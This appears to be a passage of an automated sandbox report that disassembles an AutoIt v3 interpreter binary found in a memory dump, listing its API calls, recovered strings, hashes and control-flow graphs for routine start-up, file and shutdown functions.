                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                      • String ID: H
                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                      • Opcode ID: 914af0c7b42711c4c82e2e887d26b751614341bcf0ce2277e7ec0e93ba3c3e1a
                                                                                                                                                      • Instruction ID: 6037256a109de17f7ae9a1a92be15ee876fb74172495b70e234836d7d1813d2b
                                                                                                                                                      • Opcode Fuzzy Hash: 914af0c7b42711c4c82e2e887d26b751614341bcf0ce2277e7ec0e93ba3c3e1a
                                                                                                                                                      • Instruction Fuzzy Hash: 1DA14332A002458FCF19AF68E856BAE7FE1BB46324F14515DF809DF2E1DB309902DB51
                                                                                                                                                      Function 0053345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00533465
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00533474
                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 0053348A
                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 0053349C
                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 005334AE
                                                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005334C6
                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00533517
                                                                                                                                                        • Part of subcall function 005335AB: GetSysColorBrush.USER32(0000000F), ref: 005335DE
                                                                                                                                                        • Part of subcall function 005335AB: RegisterClassExW.USER32(00000030), ref: 00533608
                                                                                                                                                        • Part of subcall function 005335AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00533619
                                                                                                                                                        • Part of subcall function 005335AB: InitCommonControlsEx.COMCTL32(?), ref: 00533636
                                                                                                                                                        • Part of subcall function 005335AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00533646
                                                                                                                                                        • Part of subcall function 005335AB: LoadIconW.USER32(000000A9), ref: 0053365C
                                                                                                                                                        • Part of subcall function 005335AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0053366B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                      • Opcode ID: 5ec9df910a8497db3ece51df0c6bf1677197b32daa59800b55e35a5f6feb8538
                                                                                                                                                      • Instruction ID: 93ddeb74deba45749b6b9bcd89a97715a241da18b68914e400e30ff78e049059
                                                                                                                                                      • Opcode Fuzzy Hash: 5ec9df910a8497db3ece51df0c6bf1677197b32daa59800b55e35a5f6feb8538
                                                                                                                                                      • Instruction Fuzzy Hash: B1214F70D40315AFDB189FA5EC69B9A7FF6FF48B50F00102AE504E62A0D3B949459F90
                                                                                                                                                      Function 0053CA50 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0053CE8E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                      • String ID: p3`$p3`$p3`$p3`$p5`$p5`$x3`$x3`
                                                                                                                                                      • API String ID: 1385522511-3694894235
                                                                                                                                                      • Opcode ID: 06b52d21b1733dc0cd2bda98e7476d2f8b43570cdfb042fb9573d75d31209603
                                                                                                                                                      • Instruction ID: 75fe5248d08402586666cf72566a7b3d6a6437d88d8c186504cf289f0c3f2c28
                                                                                                                                                      • Opcode Fuzzy Hash: 06b52d21b1733dc0cd2bda98e7476d2f8b43570cdfb042fb9573d75d31209603
                                                                                                                                                      • Instruction Fuzzy Hash: 6C32BB74A002599FDB24DF58C885ABABFBAFF44314F148459EC16BB3A1C774AD42CB90
                                                                                                                                                      Function 00533AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 845 533aa3-533ac6 846 574139-57414c call 59a12a 845->846 847 533acc-533b35 call 55019b call 537953 call 53bf07 call 537953 * 2 call 536e52 845->847 853 574153-57415b 846->853 880 533b3b-533b48 call 536cce call 536b12 847->880 881 57456b-57457b call 59a12a 847->881 855 57415d-574165 853->855 856 57416b-574173 853->856 855->856 858 533b64-533bd3 call 53bf07 call 533a70 call 53bf07 call 53557e call 5341c9 call 536bfa 855->858 859 574175-57417c 856->859 860 57417e-574186 856->860 895 5741b4-5741bf 858->895 896 533bd9-533c48 call 53bf07 * 2 call 53694e call 537af4 SetCurrentDirectoryW call 53bd2c * 2 call 55019b call 5341a6 858->896 863 5741a6-5741af call 59d4bf 859->863 864 574191-574199 860->864 865 574188-57418f 860->865 863->858 864->858 869 57419f-5741a1 864->869 865->863 869->863 892 533b4d-533b5e call 536afb 880->892 888 574580 881->888 888->888 892->853 892->858 895->896 898 5741c5-5741f8 call 537953 call 53636d 895->898 942 533c4c-533c51 896->942 908 574502-574519 call 59a12a 898->908 909 5741fe-574225 call 5a35cd call 5363db 898->909 917 533da5-533df0 call 53bd2c * 2 call 537953 call 53bd2c call 537953 call 5501a4 908->917 909->908 925 57422b-5742a7 call 55016b call 53bc23 call 53bb3d 909->925 944 57446f-5744ab call 53bc23 call 5a13a0 call 594a0c call 554d0e 925->944 945 5742ad-5742cf call 53bc23 925->945 946 533d71-533d92 call 537953 SetCurrentDirectoryW 942->946 947 533c57-533c64 call 53ad74 942->947 994 5744ad-5744d2 call 535c10 call 5501a4 call 5a1388 944->994 960 5742e5-5742f0 call 5a14a6 945->960 961 5742d1-5742e0 945->961 946->917 963 533d94-533da2 call 55015d call 5501a4 946->963 947->946 962 533c6a-533c86 call 534093 call 533ff3 947->962 977 5742f2-574308 960->977 978 57430d-574318 call 5a1492 960->978 966 574401-574414 call 53bb3d 961->966 990 57454e-574566 call 59a12a 962->990 991 533c8c-533ca3 call 533fb8 call 554cf3 962->991 963->917 966->945 983 57441a-574424 966->983 977->966 997 57432e-574339 call 54e607 978->997 998 57431a-574329 978->998 987 574457 call 59a486 983->987 988 574426-574434 983->988 1004 57445c-574469 987->1004 988->987 995 574436-574455 call 5340e0 988->995 990->946 1013 533cc6-533cc9 991->1013 1014 533ca5-533cc0 call 556755 991->1014 994->917 995->1004 997->966 1009 57433f-57435b call 599f0d 997->1009 998->966 1004->944 1004->945 1021 57435d-574388 call 53b25f call 53bd2c 1009->1021 1022 57438a-57438d 1009->1022 1018 533df3-533df9 1013->1018 1019 533ccf-533cd4 1013->1019 1014->1013 1014->1018 1018->1019 1027 533dff-57452a 1018->1027 1024 57452f-574537 call 599dd5 1019->1024 1025 533cda-533d13 call 53b25f call 533e15 1019->1025 1072 5743b6-5743c7 call 53bc23 1021->1072 1032 57438f-5743b5 call 53b25f call 537d27 call 53bd2c 1022->1032 1033 5743c9-5743cc 1022->1033 1048 57453c-57453f 1024->1048 1057 533d30-533d32 1025->1057 1058 533d15-533d2c call 5501a4 call 55015d 1025->1058 1027->1019 1032->1072 1035 5743ce-5743d7 call 599e3c 1033->1035 1036 5743ed-5743f1 call 5a142e 1033->1036 1053 5744d7-574500 call 59a12a call 5501a4 call 554d0e 1035->1053 1054 5743dd-5743e8 call 5501a4 1035->1054 1044 5743f6-574400 call 5501a4 1036->1044 1044->966 1055 574545-574549 1048->1055 1056 533e08-533e10 1048->1056 1053->994 1054->945 1055->1056 1061 533d5e-533d6b 1056->1061 1062 533e04 1057->1062 1063 533d38-533d3b 1057->1063 1058->1057 1061->942 1061->946 1062->1056 1063->1056 1071 533d41-533d44 1063->1071 1071->1048 1077 533d4a-533d59 call 5340e0 1071->1077 1072->1044 1077->1061
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00537953: CloseHandle.KERNELBASE(?,?,00000000,00573A1C), ref: 00537973
                                                                                                                                                        • Part of subcall function 00536E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00533B33,?,00008000), ref: 00536E80
                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00533C17
                                                                                                                                                      • _wcslen.LIBCMT ref: 00533C96
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00533D81
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                      • API String ID: 3350465876-3738523708
                                                                                                                                                      • Opcode ID: 4631dc62c47b94673bb4f64e9359245ed4d738304aa42dce9d348b608290168b
                                                                                                                                                      • Instruction ID: d8b67d96f3a27028e4ba4e421f94329846cbdbfa4e1ddc999298313aca23510f
                                                                                                                                                      • Opcode Fuzzy Hash: 4631dc62c47b94673bb4f64e9359245ed4d738304aa42dce9d348b608290168b
                                                                                                                                                      • Instruction Fuzzy Hash: 14229B715083429FCB20EF24D895AAFBFE5BFD8314F00491EF589972A1DB709A48DB52
                                                                                                                                                      Function 0053F680 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: D5`$D5`$D5`$D5`$D5`D5`$Variable must be of type 'Object'.
                                                                                                                                                      • API String ID: 0-2757904317
                                                                                                                                                      • Opcode ID: a29b0837a798fcb56349b1a542b48beddcd6601bf509f54bf77f2bd917373447
                                                                                                                                                      • Instruction ID: 7499026c1cb525cb11f0355d7cc5cd1aecfad9615731db5de66de8cc8d235607
                                                                                                                                                      • Opcode Fuzzy Hash: a29b0837a798fcb56349b1a542b48beddcd6601bf509f54bf77f2bd917373447
                                                                                                                                                      • Instruction Fuzzy Hash: 28C29971E00216DFCB24DF98C884BAEBBB1FF49304F248569E905AB3A1D771AD45CB91
                                                                                                                                                      Function 005402F0 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 005415A2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                      • String ID: D5`$D5`$D5`$D5`$D5`D5`
                                                                                                                                                      • API String ID: 1385522511-3525585743
                                                                                                                                                      • Opcode ID: c222207f7a145c6ca96691c81c85d2e9e729109951c38b79bc931ec1a947e9dd
                                                                                                                                                      • Instruction ID: e219d0ee68bea963e9606e7788918813e25ec17b6372caa6e6efb0f22ca149b2
                                                                                                                                                      • Opcode Fuzzy Hash: c222207f7a145c6ca96691c81c85d2e9e729109951c38b79bc931ec1a947e9dd
                                                                                                                                                      • Instruction Fuzzy Hash: 67B29C74A08741CFCB24DF18C484AAABBE1BF85318F24585DEA859B391D771ED85CF82
                                                                                                                                                      Function 00532A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2051 532a52-532a8b 2052 532a91-532aa7 mciSendStringW 2051->2052 2053 5739f4-5739f5 DestroyWindow 2051->2053 2054 532d08-532d15 2052->2054 2055 532aad-532ab5 2052->2055 2056 573a00-573a0d 2053->2056 2058 532d17-532d32 UnregisterHotKey 2054->2058 2059 532d3a-532d41 2054->2059 2055->2056 2057 532abb-532aca call 532e70 2055->2057 2063 573a0f-573a12 2056->2063 2064 573a3c-573a43 2056->2064 2071 532ad0-532ad8 2057->2071 2072 573a4a-573a56 2057->2072 2058->2059 2061 532d34-532d35 call 532712 2058->2061 2059->2055 2062 532d47 2059->2062 2061->2059 2062->2054 2068 573a14-573a1c call 537953 2063->2068 2069 573a1e-573a21 FindClose 2063->2069 2064->2056 2067 573a45 2064->2067 2067->2072 2073 573a27-573a34 2068->2073 2069->2073 2075 573a6e-573a7b 2071->2075 2076 532ade-532b03 call 53e650 2071->2076 2078 573a60-573a67 2072->2078 2079 573a58-573a5a FreeLibrary 2072->2079 2073->2064 2077 573a36-573a37 call 5a3c0b 2073->2077 2083 573aa2-573aa9 2075->2083 2084 573a7d-573a9a VirtualFree 2075->2084 2089 532b05 2076->2089 2090 532b3a-532b45 CoUninitialize 2076->2090 2077->2064 2078->2072 2082 573a69 2078->2082 2079->2078 2082->2075 2083->2075 2086 573aab 2083->2086 2084->2083 2085 573a9c-573a9d call 5a3c71 2084->2085 2085->2083 2091 573ab0-573ab4 2086->2091 2092 532b08-532b38 call 533047 call 532ff0 2089->2092 2090->2091 2093 532b4b-532b50 2090->2093 2091->2093 2094 573aba-573ac0 2091->2094 2092->2090 2096 573ac5-573ad2 call 5a3c45 2093->2096 2097 532b56-532b60 2093->2097 2094->2093 2110 573ad4 2096->2110 2098 532b66-532b71 call 53bd2c 2097->2098 2099 532d49-532d56 call 54fb27 2097->2099 2111 532b77 call 532f86 2098->2111 2099->2098 2112 532d5c 2099->2112 2114 573ad9-573afb call 55015d 2110->2114 2113 532b7c-532be7 call 532e17 call 5501a4 call 532dbe call 53bd2c call 53e650 call 532e40 call 5501a4 2111->2113 2112->2099 2113->2114 2140 532bed-532c11 call 5501a4 2113->2140 2119 573afd 2114->2119 2122 573b02-573b24 call 55015d 2119->2122 2128 573b26 2122->2128 2131 573b2b-573b4d call 55015d 2128->2131 2138 573b4f 2131->2138 2141 573b54-573b61 call 596d63 2138->2141 2140->2122 2147 532c17-532c3b call 5501a4 2140->2147 2146 573b63 2141->2146 2149 573b68-573b75 call 54bd6a 2146->2149 2147->2131 2152 532c41-532c5b call 5501a4 2147->2152 2155 573b77 2149->2155 2152->2141 2157 532c61-532c85 call 532e17 call 5501a4 2152->2157 2158 573b7c-573b89 call 5a3b9f 2155->2158 2157->2149 2166 532c8b-532c93 2157->2166 2165 573b8b 2158->2165 2168 573b90-573b9d call 5a3c26 2165->2168 2166->2158 2167 532c99-532caa call 53bd2c call 532f4c 2166->2167 2175 532caf-532cb7 2167->2175 2174 573b9f 2168->2174 2176 573ba4-573bb1 call 5a3c26 2174->2176 2175->2168 2177 532cbd-532ccb 2175->2177 2182 573bb3 2176->2182 2177->2176 2179 532cd1-532d07 call 53bd2c * 3 call 532eb8 2177->2179 2182->2182
                                                                                                                                                      APIs
                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00532A9B
                                                                                                                                                      • CoUninitialize.COMBASE ref: 00532B3A
                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 00532D1F
                                                                                                                                                      • DestroyWindow.USER32(?), ref: 005739F5
                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00573A5A
                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00573A87
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                      • String ID: close all
                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                      • Opcode ID: 0cd079353cc94c3d259ddbbe6418941f57219d2333d55fed402f6b065888bb00
                                                                                                                                                      • Instruction ID: 6ba69774891199057b536ea8cbfa3d42d288fd4eaa1e353da79cf22d6017e9c3
                                                                                                                                                      • Opcode Fuzzy Hash: 0cd079353cc94c3d259ddbbe6418941f57219d2333d55fed402f6b065888bb00
                                                                                                                                                      • Instruction Fuzzy Hash: 34D17C31701612CFCB19EF14D89AB29FFA4BF44710F1485ADE84AAB251CB30AD16EF51
                                                                                                                                                      Function 005A874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2190 5a874a-5a878c call 5722f0 call 538e70 2195 5a878e-5a879c call 53c92d 2190->2195 2196 5a87a2 2190->2196 2195->2196 2204 5a879e-5a87a0 2195->2204 2198 5a87a4-5a87b0 2196->2198 2200 5a886d-5a891f call 538e70 call 53557e call 55d913 call 5593c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 2198->2200 2201 5a87b6 2198->2201 2235 5a8973-5a8984 call 53e650 2200->2235 2236 5a8921-5a892d call 59e387 2200->2236 2203 5a87ba-5a87c0 2201->2203 2206 5a87ca-5a87cf 2203->2206 2207 5a87c2-5a87c8 2203->2207 2204->2198 2210 5a87d9-5a87df 2206->2210 2211 5a87d1-5a87d4 2206->2211 2209 5a87d6 2207->2209 2209->2210 2213 5a8848-5a884a 2210->2213 2214 5a87e1-5a87e4 2210->2214 2211->2209 2217 5a884b-5a884e 2213->2217 2214->2213 2216 5a87e6-5a87e9 2214->2216 2219 5a87eb-5a87ee 2216->2219 2220 5a8844-5a8846 2216->2220 2221 5a8858 2217->2221 2222 5a8850-5a8856 2217->2222 2219->2220 2224 5a87f0-5a87f3 2219->2224 2225 5a883d-5a883e 2220->2225 2226 5a885c-5a8867 2221->2226 2222->2226 2228 5a8840-5a8842 2224->2228 2229 5a87f5-5a87f8 2224->2229 2225->2217 2226->2200 2226->2203 2228->2225 2229->2228 2231 5a87fa-5a87fd 2229->2231 2233 5a883b 2231->2233 2234 5a87ff-5a8802 2231->2234 2233->2225 2234->2233 2237 5a8804-5a8807 2234->2237 2247 5a8987-5a898b call 53bd2c 2235->2247 2236->2235 2248 5a892f-5a893a call 59e9c5 2236->2248 2240 5a8809-5a880c 2237->2240 2241 5a8834-5a8839 2237->2241 2240->2241 2244 5a880e-5a8811 2240->2244 2241->2217 2245 5a882d-5a8832 2244->2245 2246 5a8813-5a8816 2244->2246 2245->2217 2246->2245 2249 5a8818-5a881b 2246->2249 2254 5a8990-5a8998 2247->2254 2256 5a89cf 2248->2256 2257 5a8940-5a8967 GetFileAttributesW SetFileAttributesW 2248->2257 2252 5a881d-5a8820 2249->2252 2253 5a8826-5a882b 2249->2253 2252->2253 2258 5a899b-5a89af call 53e650 2252->2258 2253->2217 2259 5a89d3-5a89e5 call 5a9f9f 2256->2259 2260 5a8969-5a8971 SetCurrentDirectoryW 2257->2260 2261 5a89b1-5a89b3 2257->2261 2258->2254 2267 5a89ea-5a89ec 2259->2267 2260->2235 2265 5a8a02-5a8a0c SetCurrentDirectoryW 2261->2265 2266 5a89b5-5a89cd SetCurrentDirectoryW call 554d13 2261->2266 2265->2247 2266->2259 2267->2265 2269 5a89ee-5a89fb call 53e650 2267->2269 2269->2265
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005A8907
                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?), ref: 005A891B
                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 005A8945
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000), ref: 005A895F
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005A8971
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005A89BA
                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 005A8A0A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                      • String ID: *.*
                                                                                                                                                      • API String ID: 769691225-438819550
                                                                                                                                                      • Opcode ID: e497121d75abbb744bc4ecdaf2097d6b69f32e6d471dc5f30f38a24f8ea7741b
                                                                                                                                                      • Instruction ID: 41a7d5ae5ea76cdee2ba7ad20da5906add570fc3ea65b9997faf85a6593542e4
                                                                                                                                                      • Opcode Fuzzy Hash: e497121d75abbb744bc4ecdaf2097d6b69f32e6d471dc5f30f38a24f8ea7741b
                                                                                                                                                      • Instruction Fuzzy Hash: B7818C725042029FCB20EE54C484ABEBBE8BB96310F544C2AF885D7251EF39E945CB92
                                                                                                                                                      Function 00532735 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153comCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00533205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00533236
                                                                                                                                                        • Part of subcall function 00533205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0053323E
                                                                                                                                                        • Part of subcall function 00533205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00533249
                                                                                                                                                        • Part of subcall function 00533205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00533254
                                                                                                                                                        • Part of subcall function 00533205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0053325C
                                                                                                                                                        • Part of subcall function 00533205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00533264
                                                                                                                                                        • Part of subcall function 0053318C: RegisterWindowMessageW.USER32(00000004,?,00532906), ref: 005331E4
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005329AC
                                                                                                                                                      • OleInitialize.OLE32 ref: 005329CA
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 005739E7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
